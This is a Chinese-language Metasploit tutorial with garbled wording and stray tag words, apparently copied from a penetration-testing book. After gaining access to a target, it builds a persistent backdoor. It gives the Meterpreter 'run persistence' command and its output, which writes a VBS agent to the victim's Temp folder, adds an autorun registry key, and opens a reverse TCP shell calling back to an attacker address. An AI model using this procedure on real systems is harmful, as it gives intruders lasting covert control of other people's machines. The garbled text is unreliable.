當成功獲取目標系統的訪問權限後,須要尋找方法來恢復與目標主機的鏈接,而無需再進入目標系統。若是目標用戶破壞了該鏈接,例如從新啓動計算機,此時使用後門將容許自動從新與目標系統創建鏈接。爲了後續滲透方便,因此須要建立一個後門。這樣,即便鏈接被中斷,也不會影響工做。下面將介紹建立持久後門。建立持久後門的具體操做步驟以下所示。windows
(1)激活Meterpreter會話。執行命令以下所示:session
msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1… meterpreter >
(2)建立持久後門以前,先查看下它的幫助文件。執行命令以下所示:tcp
以上信息顯示了持久後門的一些選項。使用不一樣的選項,來設置後門。code
(3)建立一個持久後門。執行命令以下所示:ip
meterpreter > run persistence -U -A -i 10 - 8090 -r 192.168.41.234 [*] Running Persistance Script [*] Resource file for cleanup created at /root/.msf4/logs/persistence/ AA-886OKJM26FSW_20140507.2857/AA-886OKJM26FSW_20140507.2857.rc [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.41.234 LPORT=4444 [*] Persistent agent script is 148405 bytes long [+] Persistent Script written to C:\DOCUME~1\Test\LOCALS~1\Temp\IzXBdJvcpnD.vbs [*] Starting connection handler at port 4444 for windows/meterpreter/reverse_tcp [+] Multi/Handler started! [*] Executing script C:\DOCUME~1\Test\LOCALS~1\Temp\IzXBdJvcpnD.vbs [+] Agent executed with PID 1612 [*] Installing into autorun as HKCU\Software\Microsoft\Windows\ CurrentVersion\Run\mERugsIe [+] Installed into autorun as HKCU\Software\Microsoft\Windows\ CurrentVersion\Run\mERugsIe
輸出的信息顯示了建立後門的一個過程。在以上信息中能夠看到,在目標系統中建立了一個持久腳本,保存在C:\DOCUME~1\Test\LOCALS~1\Temp\IzXBdJvcpnD.vbs。而且,該腳本會自動在目標主機上運行,此時將會創建第二個Meterpreter會話。以下所示:it
meterpreter > [*] Meterpreter session 2 opened (192.168.41.234:443 -> 192.168.41.146:1032) at 2014-05-07 16:25:47 +0800
看到以上的輸出信息,表示該持久後門已建立成功。io